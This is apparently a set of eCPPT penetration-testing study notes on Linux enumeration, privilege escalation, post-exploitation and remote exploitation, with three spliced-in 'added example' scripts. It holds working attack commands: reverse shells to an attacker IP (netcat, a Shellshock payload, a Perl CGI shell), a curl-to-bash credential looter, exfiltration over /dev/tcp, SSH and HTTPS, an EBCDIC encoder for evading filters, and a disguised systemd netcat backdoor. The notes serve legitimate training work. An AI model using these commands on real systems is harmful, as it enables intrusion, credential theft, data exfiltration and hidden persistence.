├── Banner Grabbing and OS Discovery.txt
├── Exploiting Linux.ctb
├── Firewall and IDS Evasion.txt
├── Linux Enumeration Remore Enumeration.txt
├── Linux Enumeration Remote and Local Enumeration.txt
├── Linux Post Exploitation.txt
├── Linux Remote Exploitation.txt
├── Low hanging fruit.txt
├── MITMf Python.txt
├── More NMAP Tricks eCPPT.txt
├── Network Security.ctb
├── Pillaging.txt
├── PowerShell Cont..txt
├── Powershell.txt
├── PrivEsc and Maintain Access.txt
├── Responder and MultiRelay MITM SMB hash attacks.txt
├── SMB Enumeration.txt
├── SNMP Enumeration.txt
├── SSH Tunneling.txt
├── XSS.txt
├── eCPPT Labs Network Security.ctb.pdf
├── eCPPT Labs.ctb
├── ineBurpSuite.txt
├── ineSQL.txt
└── powershell finished.txt

/Banner Grabbing and OS Discovery.txt:
--------------------------------------------------------------------------------
Banner Grabbing

There are a few tools for banner grabbing: telnet and netcat

If the version is not shown in the nmap scan you can try a banner grab with telnet or netcat
Another way is to try to log into the service, such as ssh
ex:
nc 10.10.10.1 22
This grabs the banner of port 22 on that IP address with netcat (an SSH server announces its version string as soon as the TCP connection is open)

OS Fingerprinting

You can use nmap (-O)

Another tool you can use is p0f, which fingerprints passively from the traffic it sniffs instead of sending probes
./p0f -i eth0
--------------------------------------------------------------------------------

/Exploiting Linux.ctb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/overgrowncarrot1/eCPPT-Notes/9ffd59cb5a94c7b70544cba67c81e8683a370d58/Exploiting Linux.ctb
--------------------------------------------------------------------------------

/Firewall and IDS Evasion.txt:
--------------------------------------------------------------------------------
Firewall / IDS Evasion

nmap -sS -f <target>
-sS executes a SYN scan
-f tells nmap to fragment the packets (8-byte fragments)
-f cannot be combined with -sT or -sV (those use full TCP connections through the OS stack, so there is nothing for nmap to fragment)
We can also use --mtu <size>
This specifies a custom fragment size
The size must be a multiple of eight

A way to fool analysts is by using decoys
Decoys only work if the decoy hosts are up and running (a decoy that is down is an easy giveaway)
Traffic should not be sent from one decoy at a time; all of them should scan at the same time
This hides the attacker's IP among the decoy IPs and makes it harder for analysts to know who actually attacked them

nmap -sS -D <decoy1>,<decoy2>,<decoy3>,ME <target>
ME tells nmap where in the list to put the IP address of your Kali machine
If you do not specify ME, nmap puts you in a random position

You cannot use decoys with -sT or -sV

TIMING

To evade detection you may use the timing templates
-T0 paranoid    5 min between probes
-T1 sneaky      15 sec
-T2 polite      0.4 sec
-T3 normal      default
-T4 aggressive  10 millisec
-T5 insane      5 millisec

Can also limit retries so nmap does not retransmit too many times
--max-retries 1

SOURCE PORT

We can change the source port to use ports that are allowed through a firewall
Most firewalls allow port 53 (DNS), so we could use that as the source port and run a scan

nmap -sS --source-port 53 <target>
nmap -g 80 -sS <target>

Notice -g can be used instead of --source-port
--------------------------------------------------------------------------------

/Linux Enumeration Remore Enumeration.txt:
--------------------------------------------------------------------------------
(This file is a line-for-line copy of the REMOTE ENUMERATION half of Linux Enumeration Remote and Local Enumeration.txt, which follows; it is not repeated here.)
--------------------------------------------------------------------------------

/Linux Enumeration Remote and Local Enumeration.txt:
--------------------------------------------------------------------------------
Linux Enumeration

REMOTE ENUMERATION:

First try to see if the machine is Linux based:

nmap -O --osscan-guess <target>

nmap -v -sT -O <target>

nmap -v -sS -sU -sV -n <target>

Enumerating Network File System (NFS):

nmap -sT -sU -sV -p2049 <target>

Exports configured for any given NFS server can usually be found in /etc/exports
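As an added example that is not part of these notes, here is a quick audit of an exports file for the two things that matter most to an attacker once a share is found: a client field of "*" (or no client at all), which lets any host mount the share, and no_root_squash, which lets a remote root stay root on the share and plant SUID binaries or root-owned files. It reads /etc/exports syntax from a file (on a box you already have a shell on, point it at /etc/exports itself); the sample file below is constructed.

```shell
#!/bin/sh
# Added example, not from the eCPPT notes. Flags NFS exports that any host can mount
# ("*" or an empty client field) and exports that keep remote root as root
# (no_root_squash). Input is /etc/exports syntax; the sample file is constructed.

audit_exports() {   # audit_exports <exports-file>  -> one finding per line
  awk '
    /^[[:space:]]*#/ || NF == 0 { next }          # comments and blank lines
    {
      path = $1
      for (i = 2; i <= NF; i++) {
        client = $i; opts = ""
        if (match($i, /\(.*\)/)) {               # host(opt,opt) form
          client = substr($i, 1, RSTART - 1)
          opts   = substr($i, RSTART + 1, RLENGTH - 2)
        }
        if (client == "") client = "*"           # bare "(opts)" means any host
        optlist = "," opts ","
        if (client == "*")
          print path ": mountable from any host (" $i ")"
        if (optlist ~ /,no_root_squash,/)
          print path ": no_root_squash for " client " (remote root keeps uid 0)"
        if (client == "*" && optlist ~ /,rw,/)
          print path ": writable from any host"
      }
    }' "$1"
}

# Constructed sample exports file (not from a real system).
EXPORTS=$(mktemp)
cat > "$EXPORTS" <<'EOF'
# /etc/exports
/srv/www      192.168.1.0/24(rw,sync,no_subtree_check)
/srv/backup   *(rw,no_root_squash)
/home/bob     *(ro)
/pub          (ro,insecure)
/srv/secure   10.0.0.5(rw,root_squash)
EOF

audit_exports "$EXPORTS"
```

On the sample this reports /srv/backup three times (any host, no_root_squash, writable), /home/bob and /pub once each, and nothing for the two exports restricted to specific hosts. A remote showmount -e only gives you the path and client columns, so the no_root_squash check is one to run once you are on the box.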

ls /usr/share/nmap/scripts/ | grep nfs
nmap --script nfs-ls,nfs-showmount,nfs-statfs <target>
We can also use showmount -e <target>, but it does not show as much information

IF YOU FIND AN EXPORT LIST WITH "*" YOU ARE GOLDEN AND THE IT PEOPLE ARE SCREWED (any host can mount it)
AN EXPORT LIST SHOULD BE RESTRICTED TO SPECIFIC HOSTS SO THAT NOT JUST ANYONE CAN MOUNT IT

Mounting NFS:

mkdir -p /mnt/home/bob (or whatever the exported directory is called)
mount -t nfs <target>:/home/bob /mnt/home/bob -o nolock
mount
will show if mounting was successful
cd /mnt/home/bob
ls -la

Portmapper (RPCBIND):

This is port 111 (sometimes 32771) and is commonly found on Linux systems

nmap --script rpc-grind,rpcinfo -p 111 <target>

rpcinfo -p <target>

SMB (Samba):

nmap -sT -sU -sV -p135,137,138,139,445 --open <target>

nmap --script smb-enum-shares,smb-enum-users <target>

smbclient -L <target>

smbmap -H <target>

smbclient \\\\<target>\\<share>
smbclient \\\\192.168.1.2\\www
This may work if anonymous login is allowed; the scripts and tools above show where it is allowed when
enumerating SMB

Another method, mounting an SMB share:

mkdir /mnt/www
mount -t cifs \\\\192.168.1.2\\www /mnt/www
you may need to install cifs support with apt install cifs-utils
cd /mnt/www
ls -als

Enumerating SMB Users:

Using rpcclient and a potential list of usernames we may have already gathered in other phases

Make a txt file with usernames in it
make a basic script:
#!/bin/bash
# Null session to the target, look up each name; real user accounts come back as "User: 1"
for u in $(cat users.txt); do
    rpcclient -U "" 192.168.1.2 -N --command="lookupnames $u"
done | grep "User: 1"

In the above command -U "" is an anonymous login (the empty username),
-N means no password (a null session),
and lookupnames is an rpcclient command

Now execute that bash script

Some other commands that are useful with rpcclient and can go in your bash script:
lookupsids
netshareenum
srvinfo
enumprivs

Enum4Linux:

Yet another tool, and very easy to use, for enumerating SMB information
Enum4Linux can enumerate the following:
OS
Users
Password Policies
Group Memberships
Shares
Domain/Workgroup Identification

enum4linux <target>

Enumerating SMTP Users:

THIS PART APPLIES TO BOTH WINDOWS AND LINUX!

nmap --script smtp-commands -p 25 <target>
we can also connect directly to smtp
nc <target> 25
telnet <target> 25

The different verbs (features) we are looking for are RCPT, VRFY and EXPN
These verbs can be used to enumerate users

connect through telnet
first HELO with a domain:
HELO tester.localdomain
then MAIL FROM:
MAIL FROM: tester@tester.localdomain
now issue RCPT TO: with a user name:
RCPT TO: bob@tester.localdomain
valid users return status code 250, invalid ones 550

To use VRFY (which is what we have used the most up to this point on different boxes):

telnet 192.168.1.2 25
HELO foo
VRFY james
VRFY sara

again 250 is good (the user exists), 550 is bad (no such user); a 252 means the server refuses to verify and VRFY will not tell you anything

We can also use smtp-user-enum

smtp-user-enum -M VRFY -U users.txt -t 192.168.1.2
smtp-user-enum -M EXPN -u bob -t 192.168.1.2
smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt
smtp-user-enum -M EXPN -D example.com -U users.txt -t 192.168.1.2

LOCAL ENUMERATION:

The information we find here falls into two categories:
Network information
System information

NETWORK INFORMATION PHASE:

ifconfig -a
route -n
arp -en
traceroute -n <host> (this shows how many hops it takes to reach somewhere else and whether there is another router in between)
netstat -auntp
if netstat cannot be used because of a very restricted environment, look at the following instead:
/proc/net/tcp
/proc/net/udp
ss -twurp (alternative to netstat to list established connections)

To see which machine is resolving DNS queries:

cat /etc/resolv.conf

To check outbound port connectivity restrictions we can do the following from the machine:

nmap -sT -p4444-4450 portquiz.net
portquiz.net answers on every TCP port, so if the ports show as open there are no outbound restrictions on them


SYSTEM INFORMATION PHASE:

id
uname -a (shows kernel version)
grep $USER /etc/passwd (current user information)
cat /etc/passwd
cat /etc/shadow
sudo -l
cat /etc/sudoers
lastlog (most recent logins)
w (who is currently logged into the system)
last (last logged on users)
for user in $(cat /etc/passwd | cut -f1 -d ":"); do id $user; done (show UID and GID information for all users)
cat /etc/passwd | cut -f1,3,4 -d":" | grep ":0:0$" | cut -f1 -d":" (list all accounts with UID 0 and GID 0, i.e. root accounts)
cat /root/.bash_history
find /home/* -name "*.*history*" -print 2>/dev/null (can we read other users' bash history?)
cat /etc/issue (OS)
cat /etc/*-release (OS)
sudo -l | grep vim (sudo-allowed binaries known to allow breaking out into a shell)
sudo -l | grep nmap (same)
sudo -l | grep vi (same)
ls -als /root/ (always try to list the root directory)
echo $PATH (current $PATH environment variable)
cat /etc/crontab && ls -als /etc/cron* (list all cron jobs)
find /etc/cron* -type f -perm -o+w -exec ls -l {} \; (find world-writable cron jobs)
ps auxwww (list running processes)
ps -u root (list all processes running as root)
ps -u $USER (list all processes running as the current user)
find / -perm -4000 -type f 2>/dev/null (find SUID files)
find / -uid 0 -perm -4000 -type f 2>/dev/null (find SUID files owned by root)
find / -perm -2000 -type f 2>/dev/null (find SGID files)
find / -perm -o+w -type f 2>/dev/null (find world-writable files)
ls -la /etc/*.conf (list all conf files in /etc/)
grep -i pass /etc/*.conf 2>/dev/null (find conf files that contain the string "pass")
lsof -n (list open files)
dpkg -l (list installed packages)

COMMON SOFTWARE VERSIONS
sudo -V
httpd -v
apache2 -v
mysql -V
sendmail -d0.1

ps aux | awk '{print $11}' | xargs -r ls -la 2>/dev/null | awk '!x[$0]++' (print process binaries / paths and permissions)

WITH ALL THOSE COMMANDS ABOVE, USE THE FOLLOWING TOOLS TO DO THEM AUTOMATICALLY
linenum
linuxprivchecker
unix-privesc-check
mimipenguin (used to dump logon passwords for currently logged on users)
--------------------------------------------------------------------------------

/Linux Post Exploitation.txt:
--------------------------------------------------------------------------------
LINUX POST EXPLOITATION

PRIVILEGE ESCALATION:

System and Network Information

Hostname

hostname

Kernel Version

uname -a

Operating System

cat /etc/issue

IP address

ifconfig

Running Processes

ps auxw

Network Routes

route -n (find hidden networks)

DNS Server

cat /etc/resolv.conf (zone transfer, AD accounts)

ARP Cache

arp -a

Current Network Connections

netstat -auntp (may be able to sniff traffic, or make other connections)

User Information

Current User Permissions

find / -user <username>

UID and GID Information for all users

for user in $(cat /etc/passwd | cut -f1 -d ":"); do id $user; done
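The /etc/passwd triage these notes do by hand (the UID and GID loop above, the root-accounts pipeline, cat /etc/passwd for service accounts), as an added example that is not part of the notes: the same checks written as functions that take the passwd file as an argument, so they can be run against /etc/passwd on the target or against a copy pulled off it. The sample file at the bottom is constructed, hash included.

```shell
#!/bin/sh
# Added example, not from the eCPPT notes. The /etc/passwd checks from the commands above
# as functions that take the passwd file as an argument (pass /etc/passwd on the target,
# or a copy you pulled off it). The sample file at the bottom is constructed.

# Every account with UID 0: each one is a root login, whatever it is called.
uid0_accounts() {          # uid0_accounts <passwd-file>
  awk -F: '$3 == 0 { print $1 }' "$1"
}

# Accounts that can actually log in: shell is not nologin/false.
# Printed as name:u id:gid:shell so service accounts with a real shell stand out.
shell_accounts() {         # shell_accounts <passwd-file>
  awk -F: '$7 !~ /(nologin|false)$/ { print $1 ":" $3 ":" $4 ":" $7 }' "$1"
}

# Accounts with a weak password field: empty (no password asked at all) or a hash kept
# in passwd itself instead of the "x" pointer to /etc/shadow (so the hash is world-readable).
weak_passwd_fields() {     # weak_passwd_fields <passwd-file>
  awk -F: '$2 == "" { print $1 ": empty password field" }
           $2 != "" && $2 != "x" && $2 != "*" && $2 != "!" { print $1 ": hash stored in passwd" }' "$1"
}

# Constructed sample (not a real system). "toor" is a second UID 0 account,
# "guest" has no password and "legacy" carries a made-up hash directly in passwd.
PASSWD=$(mktemp)
cat > "$PASSWD" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
toor:x:0:0:maintenance:/root:/bin/sh
postgres:x:110:118:PostgreSQL:/var/lib/postgresql:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
legacy:$1$saltsalt$4vzI2Y4zBhtuq0FSZ3vR4/:1002:1002::/home/legacy:/bin/sh
EOF

echo "== UID 0 accounts ==";             uid0_accounts "$PASSWD"
echo "== accounts with a login shell =="; shell_accounts "$PASSWD"
echo "== weak password fields ==";       weak_passwd_fields "$PASSWD"
```

Matching on the numeric UID field rather than grepping for "0:0" avoids the false positive the original pipeline has on lines like bob:1000:0, and the shell filter is what separates a postgres account worth targeting from a daemon account that cannot log in.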

Last Logged on Users

last -a

Root Accounts

cat /etc/passwd | cut -f1,3,4 -d":" | grep ":0:0$" | cut -f1 -d":"

Service Accounts

cat /etc/passwd

Home Directories

ls -als /home/*

Privileged Access / Cleartext Credentials

sudo -l

find / -perm -4000 -type f 2>/dev/null

grep "password" /etc/*.conf 2>/dev/null

grep -r password /etc/*.conf 2>/dev/null

cat /etc/shadow

ls -als /root

find /* -name "*.*history*" -print 2>/dev/null (read other users' history files; finds dotfiles with "history" in their names)

touch /var/www/file (can we write to directories that are configured to serve web pages?)

cat /var/log/apache/access.log | grep -E "user|pass" (search the apache access.log for "user" and "pass" strings, e.g. credentials passed in GET query strings)

cat /etc/NetworkManager/system-connections/* | grep -E "^id|^psk" (dump cleartext pre-shared wireless keys from NetworkManager)

Services

netstat -auntp (may be able to sniff traffic, or make other connections)

find /etc/init.d/ ! -uid 0 -type f 2>/dev/null | xargs ls -la (service scripts not owned by root, so possibly modifiable by our current user)

cat /etc/mysql/my.cnf

service <service_name> start/stop (can we start or stop different services?)

Jobs/Tasks

cat /etc/crontab

ls -las /etc/cron.*

find /etc/cron* -type f -perm -o+w -exec ls -la {} \; (any custom jobs configured as root that are world writable?)

Installed Software Version Information

dpkg -l

We can find a lot of this information with the LinEnum tool or LinPEAS

https://github.com/rebootuser/LinEnum

Netcat File Transfer

On the target machine (start the listener first)

nc -lp 1234 > LinEnum.sh

On the local Kali machine

nc -w 3 <target-ip> 1234 < LinEnum.sh

Then on the target

chmod +x LinEnum.sh

./LinEnum.sh -h (shows the help menu)

./LinEnum.sh -k <keyword> (search for a keyword, such as password)


Gathering Information with Metasploit

msf> use post/linux/gather/enum_configs

set session and then run

msf> use post/linux/gather/enum_system

Gaining information with man

If the user is allowed to run man with sudo we can run it with a custom pager, which lets us read files we should not be able to

sudo man -P "cat /etc/shadow" man

Restricted shell (rbash)

run the env command to confirm we are in an rbash shell (SHELL=/bin/rbash)

If you can run binaries such as vim, nmap, less and so on you can break out of the shell with !sh (in nmap remember it is nmap --interactive then !sh)

vi /tmp/test
!sh

We can also use the find command to break out of restricted shells

find /home/bob -name test -exec /bin/sh \;

Spawning a shell from the python interpreter can also break us out

Using perl

perl -e 'exec "/bin/sh";'

We can also break out using SSH as long as we have credentials

ssh <user>@<host> -t "/bin/sh"

Using Unshadow

unshadow <passwd file> <shadow file> > shadow.john

john shadow.john --wordlist=<wordlist>

MimiPenguin

https://github.com/huntergregal/mimipenguin.git

Used to obtain credentials from memory (like mimikatz, or kiwi, on Windows)

Tries to dump cleartext passwords from the following places:

GDM password (Kali Desktop, Debian Desktop)
Gnome Keyring (Ubuntu Desktop, ArchLinux Desktop)
VSFTPd (active FTP connections)
Apache2 (active HTTP Basic Auth sessions)
OpenSSH (active SSH sessions - sudo usage)

There are 2 different MimiPenguin scripts, a shell script and a python script

Get MimiPenguin onto the target machine and then run ./mimipenguin.sh (or ./mimipenguin.py); it needs root, since it reads other processes' memory

Pilfering Credentials from Swap Memory

swapon -s (shows the swap partitions) (can also use cat /proc/swaps)

strings <swap partition> | grep "password="

strings /dev/sda5 | grep "password="

strings <swap partition> | grep "&password="

strings /dev/sda5 | grep "&password="

RPATH and RUNPATH Exploits

First we must determine if a program is using RPATH or RUNPATH

objdump -x /usr/local/bin/program | grep RPATH

objdump -x /usr/local/bin/program | grep RUNPATH

We will see where the program is pointing, which is usually a directory

The program will look for shared object (.so) files in that directory and load them before the system libraries

This means that if we can write to that directory we can put a malicious .so file in the path the program is looking at and, hopefully, it will load it (the file must carry the name of a library the binary actually loads; check with ldd)

msfvenom -a x64 -p linux/x64/shell_reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f elf-so -o program.so

Now serve that payload

python -m SimpleHTTPServer 80

On the target machine

cd <rpath directory> && wget http://<attacker-ip>/program.so

cd /tmp/program/libs && wget http://192.168.1.49/program.so

Now start a listener

msf> use exploit/multi/handler

set payload linux/x64/shell_reverse_tcp
set LHOST <attacker-ip>
set LPORT <port>
run -j

Now we wait for the program to be executed, execute it ourselves or, if we are lucky, it is being run as a cron job by root and we get elevated privileges and a reverse shell

Kernel Exploits

Dirty Cow
Stack Clash
DCCP Double-Free Privilege Escalation
Race Condition Privilege Escalation

searchsploit "linux kernel debian"

We can also use linux exploit suggester
https://github.com/mzet-/linux-exploit-suggester (a bash script, linux-exploit-suggester.sh, run on the target)

The older Linux_Exploit_Suggester.pl takes the kernel version as an argument instead:
perl Linux_Exploit_Suggester.pl -k 2.6.38 (or whatever kernel you find)

Remember to find the kernel version if you already have a shell

uname -a

If it is the UDEV < 1.4.1 - Local Privilege Escalation Exploit there is a video in this section that shows how to run that exploit

For kernel exploits we usually need to compile them

gcc --version (make sure gcc is installed)

gcc exploit.c -o exploit
chmod +x exploit
./exploit (to run)

If the target is 32 bit and you need to compile for it

gcc -m32 exploit.c -o exploit

Metasploit also has plenty of kernel exploits built into it

The slides talk about exploit/linux/local/udev_netlink
set session
run

Kernelpop

This was new when the course was made, we can download it from the following

https://github.com/spencerdodd/kernelpop

Unix Socket Exploitation

If our non-root user can talk to the docker socket (for example by being in the docker group) we can start a container, which runs as root, with host files mounted inside it, so we can read files such as /etc/shadow

docker run -v /etc/shadow:/docker/hashedpasswords -d postgres
docker exec -ti <container-id> bash
cat /docker/hashedpasswords > /docker/test.txt
chmod 777 /docker/test.txt
cat /docker/test.txt


LATERAL MOVEMENT:

SSH Hijacking

ps aux | grep sshd

grep SSH_AUTH_SOCK /proc/<pid>/environ (needs root, or the same user as the session owner)

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.XXXX ssh-add -l (lists the keys loaded in the hijacked agent)

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.XXXX ssh remotesystem -l victim

Stealing SSH Credentials

use sshLooter

https://github.com/mthbernardes/sshLooter.git

On the target machine

curl http://<attacker-ip>/<sshLooter script> | bash

Samba Secrets to Domain Admin

When a new Samba user is created the information is stored in a secrets.tdb file

/var/lib/samba/private

tdbdump /var/lib/samba/private/secrets.tdb

We can then use the information for pass the hash with the pth toolkit

https://github.com/byt3bl33d3r/pth-toolkit

For information on how to do this

https://medium.com/@br4nsh/from-linux-to-ad-10efb529fae9

VPNPivot

Used to create a VPN tunnel between the attacker and compromised Linux hosts that may be behind firewalls or NAT

https://github.com/0x36/VPNPivot

Dumping Stored Firefox Credentials

When firefox is launched it creates a default profile for the user

/home/<user>/.mozilla/firefox (there should be a .default directory with a random string in front of it)

Passwords are stored in the randomly named profile folder, in logins.json, and can be decrypted with firefox_decrypt.py

https://github.com/unode/firefox_decrypt

The above tool only works without prompting for a Master Password when none has been set


DATA EXFILTRATION:

Exfil over a TCP socket with EBCDIC and Base64

First open a listener on the attacker machine

nc -lvnp 80 > datafolder.tmp

On the target system (bash, for /dev/tcp)

tar zcf - /tmp/datafolder | base64 | dd conv=ebcdic > /dev/tcp/<attacker-ip>/80

Now decode the information on the attacker machine

dd conv=ascii if=datafolder.tmp | base64 -d > datafolder.tar

tar xf datafolder.tar
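The tar | base64 | dd conv=ebcdic pipeline above and its inverse, as an added example that is not part of these notes: both sides written as functions that read from and write to files, so the round trip (and what the wire bytes look like to an ASCII keyword filter) can be checked offline before the network leg. On the wire the encoder's output goes to /dev/tcp/<attacker-ip>/80 in bash, or to nc <attacker-ip> 80, instead of a file, and the receiver saves the stream with nc -lvnp 80 > file and runs the decoder on that. The directory and its contents are constructed.

```shell
#!/bin/sh
# Added example, not from the eCPPT notes. The tar | base64 | dd conv=ebcdic pipeline from
# the exfil section, and its inverse, as functions that read from and write to files so the
# round trip can be checked offline first. On the wire the encoder's output goes to
# /dev/tcp/<attacker-ip>/80 (bash) or "nc <attacker-ip> 80" instead of a file; the
# receiver saves the stream with "nc -lvnp 80 > file" and runs the decoder on it.

# Pack a directory, base64 it, then translate the text to EBCDIC so an ASCII keyword
# filter watching the wire sees neither file names nor the base64 alphabet.
exfil_encode() {           # exfil_encode <dir> <outfile>
  tar zcf - -C "$(dirname "$1")" "$(basename "$1")" | base64 | dd conv=ebcdic of="$2" 2>/dev/null
}

# Undo it on the receiving side: EBCDIC -> ASCII, base64 decode, unpack into <destdir>.
exfil_decode() {           # exfil_decode <infile> <destdir>
  dd conv=ascii if="$1" 2>/dev/null | base64 -d | tar zxf - -C "$2"
}

# True when a file is plain printable ASCII, i.e. something a naive inspection tool could read.
is_plain_ascii() {         # is_plain_ascii <file>
  ! LC_ALL=C grep -q '[^[:print:][:space:]]' "$1"
}

# Offline round trip on a constructed directory (not real loot).
WORK=$(mktemp -d)
mkdir -p "$WORK/datafolder"
printf 'db_user=app\ndb_password=hunter2\n' > "$WORK/datafolder/app.conf"

exfil_encode "$WORK/datafolder" "$WORK/datafolder.tmp"      # what goes over the socket
mkdir -p "$WORK/recv"
exfil_decode "$WORK/datafolder.tmp" "$WORK/recv"             # what the attacker does

cat "$WORK/recv/datafolder/app.conf"
```

The EBCDIC step is what makes this different from plain base64: base64 output is still printable ASCII and a filter can decode it, whereas after dd conv=ebcdic every letter of the base64 alphabet lands above 0x80. Note the decode must run on a machine whose dd has the same translation tables (GNU coreutils on both ends is the safe assumption).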

Exfil over SSH

Since SSH is encrypted it is less likely to be caught doing this

On the target system

tar zcf - /tmp/datafolder | ssh root@<attacker-ip> "cd /tmp; tar zxpf -"

On the attacker machine

the information is ready to view in /tmp/datafolder

If we want to be really stealthy we can configure ssh to use port 80, in case port 22 is being monitored

Exfil via POST Request over HTTPS

On the attacker machine

Make a contact.php that writes the POST body to /tmp/datafolder.base64 (read the raw body from php://input rather than $_POST, otherwise the + characters in the base64 are decoded as spaces)

On the victim machine

curl --data "$(tar zcf - /tmp/datafolder | base64)" https://<attacker-ip>/contact.php

On the attacker machine

cat /tmp/datafolder.base64 | base64 -d > datafolder.tar && tar xf datafolder.tar

MAINTAINING ACCESS:

MKFIFO Named Pipe

Can be used to bypass different detection systems (the shell traffic is wrapped in TLS)

On the attacker machine generate a self-signed SSL certificate

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

the above command creates key.pem and cert.pem, both of which we will need

openssl s_server -quiet -key key.pem -cert cert.pem -port 443

On the target system create the named pipe and connect the shell through it

mkfifo /tmp/x; /bin/sh -i < /tmp/x 2>&1 \
  | openssl s_client -quiet -connect <attacker-ip>:443 > /tmp/x; rm /tmp/x

ICMP Reverse Shell (icmpsh)

The slides talk about this but do not show anything else; github:
https://github.com/bdamele/icmpsh

Other sites

https://highon.coffee/blog/reverse-shell-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet


Xinetd UDP Portknock Backdoor

https://gist.github.com/anonymous/3cb8e474b6bb3fd3787bda1e1a55cf56

Make sure to set the above up properly

On the attacker machine

nc -lvnp 4444

Now knock on the backdoor that was uploaded to the target system

hping3 -2 -c 1 -p 65534 <target>

Systemd Netcat Bind Shell

On the target system

cp /bin/nc /lib/systemd/systemd-service (needs a netcat that supports -e, such as netcat-traditional)

Now create a unit file called systemd.service in /etc/systemd/system/

[Unit]
Description = Systemd Service
After = network.target
[Service]
ExecStart = /lib/systemd/systemd-service -lvp 56825 -e /bin/sh
[Install]
WantedBy = multi-user.target

systemctl enable systemd.service
systemctl start systemd.service

On the attacker machine

nc <target> 56825
--------------------------------------------------------------------------------

/Linux Remote Exploitation.txt:
--------------------------------------------------------------------------------
LINUX REMOTE EXPLOITATION:

PASSWORD SPRAY ATTACK:

The concept is to take a list of as many users as possible and try the same password against all of them
This is what the eJPT black box does when you use LETMEIN as the password with a username list
AKA Reverse Brute Force Attack

Password Spray with smtp:

Use the smtp-user-enum that we learned in the last section

https://github.com/insidetrust/statistically-likely-usernames

Now that we have a username list we can use a metasploit module to check which of the users exist

msf > use auxiliary/scanner/smtp/smtp_enum
set rhosts <target>
set user_file users.txt (or whatever you named it)
run

When completed we can create a list of valid_users.txt
Now let's use some common passwords; put one, at most 2, passwords in the file (more than that against the same accounts and you start hitting lockout policies)
things such as Spring2020 and letmein


Let's see what other services we may be able to password spray against
nmap -sT 192.168.1.2 --open --max-retries 1 -n
Now that we have users (from smtp) and some services, we can use hydra to attack the target
After we find a target we can see what other computers that user may be able to log in to
We can also use hydra against a larger number of servers (say there are a few computers running ssh)
hydra -l david -p Spring2018 -M ssh_servers.txt ssh (ssh_servers.txt is a file containing IP addresses, one per line, that have ssh enabled)
We can also use Metasploit's smb_login scanner module to try to log in to SMB services
metasploit also has an owa_login module that can be used (this is in the slides, may be in the test)

EXPLOITING SAMBA:

Samba Usermap Script:

nmap --script smb-os-discovery -p445 192.168.1.2
This should show us the Samba version
We can then use that information to look on searchsploit, in metasploit or on google
The slides talk about the username map script exploitation (affects Samba 3.0.20 through 3.0.25rc3)
use exploit/multi/samba/usermap_script
set rhost <target>
set lhost <attacker-ip>
run

Samba Symlink Directory Traversal:

smbmap -H 192.168.1.2
Look for a share with read and write access
msf > use auxiliary/admin/smb/samba_symlink_traversal
set rport <port>
set rhost <target>
set SMBSHARE <whichever share had read/write access>
set SMBTARGET rootfs (the root file system)
run
smbclient \\\\192.168.1.2\\<share> -N
smbclient \\\\192.168.1.2\\tmp -N
you should now see a rootfs directory in that share
once logged in to smb,
cd to rootfs and you can use the get and put commands
cd etc
get passwd
get shadow
We can also use the tar command (from within smbclient)
tar c /tmp/all_files.tar *
this downloads all the files to the local machine
on the local machine: tar xf /tmp/all_files.tar
grep -r "password" * 2>/dev/null
hopefully we can find some passwords that way
If you find index.pl in a www share, there are things we can do with that
index.pl is a perl script
we can get that index.pl and then use cat to see what it contains
first try to put something on the smb server
in kali make a test.pl, then in smbclient do put test.pl
if successful then we can put files
in the perl file we can put something like the following just to make sure it executes:
#!/usr/bin/perl
print "Content-type: text/html\n\n";
system("id");
now browse to the web server
192.168.1.2/test.pl
you should get the id output
Now we can try to get a reverse shell using perl
http://pentestmonkey.net/tools/web-shells/perl-reverse-shell
Open a listener with netcat
nc -lvnp 1234
Go to the webpage
192.168.1.2/rev.pl
We should get a reverse shell
Another way to do the above, without pentestmonkey:
change our test.pl to connect back to us
#!/usr/bin/perl
print "Content-type: text/html\n\n";
system("nc 192.168.1.49 1234 -e /bin/sh");

EXPLOITING SHELLSHOCK:

First we are going to use dirsearch
dirsearch.py -u http://192.168.1.2/ -e cgi -r
Find cgi files that we can browse to, such as /cgi-bin/login.cgi
Now we can use an nmap script to see if this is vulnerable to shellshock
nmap --script http-shellshock --script-args uri=/cgi-bin/login.cgi 192.168.1.2 -p 80
Now to exploit shellshock (the payload goes in the User-Agent header, which the CGI environment exports as HTTP_USER_AGENT, so the vulnerable bash parses it as a function definition)
wget -U "() { foo;};echo \"Content-type: text/plain\"; echo; echo; /bin/cat /etc/passwd" http://192.168.1.2/cgi-bin/login.cgi && cat login.cgi
If this worked we should see the target system's /etc/passwd file (wget saved the response as login.cgi)
Now set up netcat and create a reverse shell
nc -lvnp 1234
wget -U "() { foo;};echo; /bin/nc 192.168.1.49 1234 -e /bin/sh" http://192.168.1.2/cgi-bin/login.cgi

EXPLOITING HEARTBLEED:

OpenSSL versions 1.0.1 through 1.0.1f
nmap --script ssl-heartbleed 192.168.1.2
msf> use auxiliary/scanner/ssl/openssl_heartbleed
set rhosts <target>
show actions
set action DUMP
run
now look where the information was dumped and you may be able to find usernames and passwords
IF YOU DO NOT GET INFORMATION THE FIRST TIME, TRY AGAIN; THIS IS LEAKING DATA FROM MEMORY SO EACH RESPONSE WILL BE DIFFERENT

EXPLOITING JAVA RMI REGISTRY:

nmap -sT 192.168.1.2 -p 1099 -sV or msf > use exploit/multi/misc/java_rmi_server
set rhosts
set ssl true (you may need to make your own cert to get around IDS)
run -j

EXPLOITING APACHE TOMCAT:

msf > use auxiliary/scanner/http/tomcat_mgr_login
set STOP_ON_SUCCESS true
set rport (most likely 8180)
set rhosts 192.168.1.2
run

upload a WAR file when you get access to the manager application
one spot (if still there) is /usr/share/laudanum, which has a cmd.war file in it
Now browse to the URL
192.168.1.2:8180/cmd/cmd.jsp
we can now execute commands on the system
I have also used reverse shells and started a listener to connect back to me


-------------------------------------------------------------------------------- /Low hanging fruit.txt: --------------------------------------------------------------------------------
Low Hanging Fruit
Misconfigured Servers
Unimplemented or badly implemented ACLs
Default or weak passwords
